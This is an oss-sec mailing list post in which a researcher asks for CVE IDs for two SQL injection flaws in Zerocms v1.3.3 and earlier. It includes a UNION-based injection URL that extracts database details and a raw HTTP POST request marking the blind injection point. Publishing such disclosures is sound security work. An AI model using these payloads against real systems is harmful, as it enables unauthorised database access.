oss-sec mailing list archives

Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities

From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Sun, 1 Feb 2015 15:49:16 +0100

I just got a reply from MITRE.

I missed, that the first SQL injection vulnerability already had been
assigned CVE-2014-4034. Sorry, I missed that one.


Greetings.

Steffen

2015-02-01 9:15 GMT+01:00 Steffen Rösemann <steffen.roesemann1986 () gmail com>
:

Hi Steve, Josh, vendors, list.

I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.

The first SQL injection vulnerability is located in the article_id
parameter used in zero_view_article.php and can be exploited even by
unauthenticated attackers.

See the following exploit-example:

http://
{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

The second vulnerability is a Blind SQL injection an is located in the
user_id parameter used in a POST request in zero_transact_user.php.

An attacker can exploit this vulnerabilitiy in the administrative backend
via the following POST request exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection
goes here}&action=Modify+Account

Could you please assign a CVE-ID for this?

Thank you very much.

Greetings from Germany.

Steffen Rösemann

References:

[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113
[6]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html
[7] http://seclists.org/fulldisclosure/2015/Feb/4

Current thread:

CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities Steffen Rösemann (Feb 01)
- Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities cve-assign (Feb 01)
- Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities Steffen Rösemann (Feb 01)